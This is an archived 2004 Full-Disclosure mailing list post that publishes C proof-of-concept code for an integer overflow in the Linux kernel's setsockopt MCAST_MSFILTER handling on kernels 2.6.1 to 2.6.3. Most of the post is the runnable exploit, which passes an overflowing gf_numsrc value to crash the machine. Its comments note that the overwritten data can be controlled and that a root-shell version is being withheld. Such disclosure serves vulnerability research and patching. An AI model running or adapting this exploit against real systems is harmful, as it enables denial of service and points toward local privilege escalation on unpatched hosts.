[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Linux kernel setsockopt MCAST_MSFILTER integer overflow proof of concept code

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Linux kernel setsockopt MCAST_MSFILTER integer overflow proof of concept code
From: Julien TINNES <spam@xxxxxxx>
Date: Wed, 21 Apr 2004 02:30:42 +0200

Here is a very simple POC for this vulnerability.

This version is only a denial of service, for kernels 2.6.1, 2.6.2, 2.6.3 
only.
Other versions have been written but won't be released for now, waiting for 
everybody to upgrade.

Julien TINNES

/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
   vulnerability found (as always ;) by Paul Starzetz

   This is only a lame POC which will crash the machine, no root shell here.
   Maybe later, when everybody will have an updated box.

   It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.

   Greets to Christophe Devine, too bad you wasn't with me for this one.

*/


#include <errno.h>
void perror (const char *s);

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/socket.h>

#define SOL_IP        0
#define MCAST_MSFILTER 48

/* mynumsrc and alloc_room control the overflow
 * what we write can be controlled too (not needed
 * here but needed for rootshell exploit
 */

#define mynumsrc 0x100          /* 0x100 should be enough, can be tweaked */
#define alloc_room 1            /* let it alocate only one u32 */

struct mygroup_filter
{
  __u32 gf_interface;           /* interface index */
  struct sockaddr_storage gf_group;     /* multicast address */
  __u32 gf_fmode;               /* filter mode */
  __u32 gf_numsrc;              /* number of sources */
  struct sockaddr_storage gf_slist[mynumsrc];   /* interface index */
};


void
main (void)
{

  int mysocket;
  int sockprot;
  struct mygroup_filter mygroup;
  int optlen;
  int i;
  struct sockaddr_in *psin;

  mygroup.gf_interface = 0;
  mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;

  mygroup.gf_group.ss_family = AF_INET;



  for (i = 0; i < mynumsrc; i++)
    {
      psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
      psin->sin_family = AF_INET;
    }


  mysocket = socket (PF_INET, SOCK_STREAM, 0);

  if (mysocket == -1)
    {
      perror ("Socket creation error: ");
      exit (1);
    }

  optlen = sizeof (struct mygroup_filter);

  printf ("Calling setsockopt(), this should crash the box...\n");
  sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen);

  if (sockprot == -1)
    {
      perror ("Invalid setsockopt: ");
      exit (1);
    }


}

Prev by Date: RE: [Full-Disclosure] Core Internet Vulnerable - News at 11:00
Next by Date: Re: [Full-Disclosure] Core Internet Vulnerable - News at 11:00
Previous by thread: [Full-Disclosure] Cisco Security Advisory: Vulnerabilities in SNMP Message Processing
Next by thread: was [Full-Disclosure] Core Internet Vulnerable - News at 11:00 -= Your message to Full-Disclosure awaits moderator approval
Index(es):
- Date
- Thread